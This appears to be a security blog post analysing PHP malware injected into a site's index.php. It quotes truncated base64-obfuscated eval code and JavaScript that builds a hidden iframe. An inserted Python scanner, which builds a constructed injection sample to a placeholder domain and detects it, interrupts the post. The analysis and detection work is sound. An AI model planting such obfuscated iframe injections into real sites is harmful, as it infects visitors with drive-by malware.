Google is getting pretty good at detecting web-based malware and blacklisting the sites that host it. This means bad business for the attackers (or "hackers", as the media like to call them), and as a result they are already changing their tactics to hide from Google.
Why is this bad business for the malware writers? Well, if a site gets blacklisted, fewer users will visit it, so fewer people will load their malware and get infected. Good for everyone else, bad for them.
Anyway, yesterday we were analyzing a piece of malware that added the following code to the index.php of a site:
<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCc…
long long long line.. ?>
After decoding it, we got code that looked like:
return base64_decode("PHNjcmlwdD5.. ..KS5qb2luKCIiKSk7PC9zY3JpcHQ+");
var bpxDsSbm8='d*%@o*%@c*%@u*%@%@a*%@.. %@t*%@p*%@:*%@/*%@/*%@n*%@i*%@n*%@o*
%@"*%@ *%@w*%@i*%@d*%@t*%@h*%@=*%@2*%@.. *%@h*%@e*%@i*%@g*%@h*%@t*%@=*%@2*%@
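The layering shown above (PHP eval of a base64 blob, which returns a second base64 blob, which holds JavaScript that rebuilds a tiny iframe from a '*%@'-separated string with split().join('')) is exactly what a file scanner can peel back. The following is an added example, not code from the post or its authors: it works on a constructed sample that imitates the pattern (the domain malicious.invalid and the payload text are made up), decodes each base64 layer, undoes the split/join trick, and flags the hidden 2x2 iframe.

```python
import base64
import re

# Constructed sample (not the post's real sample): PHP eval(base64_decode(...)) whose payload
# returns a second base64 blob holding JavaScript that rebuilds a 2x2 iframe via split/join.
SEP = "*%@"
IFRAME = '<iframe src="http://malicious.invalid/in.php" width=2 height=2></iframe>'
JS = ("<script>var bpxDsSbm8='" + SEP.join(IFRAME) + "';"
      "document.write(bpxDsSbm8.split('" + SEP + "').join(''));</script>")
INNER_PHP = f'return base64_decode("{base64.b64encode(JS.encode()).decode()}");'
INJECTED_INDEX_PHP = f'<?php /**/ eval(base64_decode("{base64.b64encode(INNER_PHP.encode()).decode()}")); ?>'

EVAL_B64 = re.compile(r'eval\s*\(\s*base64_decode\s*\(\s*["\']([A-Za-z0-9+/=]+)["\']')
B64_ARG = re.compile(r'base64_decode\s*\(\s*["\']([A-Za-z0-9+/=]+)["\']')
SPLIT_JOIN = re.compile(r"var\s+(\w+)\s*=\s*'([^']*)'.*?\1\.split\('([^']+)'\)\.join\(''\)", re.S)
IFRAME_TAG = re.compile(r"<iframe\b[^>]*>", re.I)
DIMENSION = re.compile(r"\b(width|height)\s*=\s*[\"']?(\d+)", re.I)

def peel_base64_layers(source, max_depth=5):
    """Follow nested base64_decode(...) arguments; return every decoded layer in order."""
    layers, current = [], source
    for _ in range(max_depth):
        match = B64_ARG.search(current)
        if not match:
            break
        try:
            current = base64.b64decode(match.group(1), validate=True).decode("utf-8", "replace")
        except ValueError:  # binascii.Error is a ValueError: malformed blob, stop peeling
            break
        layers.append(current)
    return layers

def recover_written_content(js):
    """Undo the 'a*%@b*%@c'.split('*%@').join('') trick; return the rebuilt string or None."""
    match = SPLIT_JOIN.search(js)
    if not match:
        return None
    return match.group(2).replace(match.group(3), "")

def scan_php(source, max_px=10):
    """Chain the steps; iframes with width or height <= max_px are the hiding trick seen above."""
    layers = peel_base64_layers(source)
    frames = []
    for layer in layers:
        rebuilt = recover_written_content(layer)
        for tag in IFRAME_TAG.findall(rebuilt or ""):
            dims = [int(v) for _, v in DIMENSION.findall(tag)]
            if dims and min(dims) <= max_px:
                frames.append(tag)
    return {"eval_base64": bool(EVAL_B64.search(source)),
            "layers": len(layers), "hidden_iframes": frames}
```

Running scan_php(INJECTED_INDEX_PHP) reports the eval/base64 wrapper, two decoded layers and the recovered 2x2 iframe, while a clean index.php yields no findings.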
If that becomes a trend, Google will have to stop using its recognizable user agent and common IP addresses for the malware check.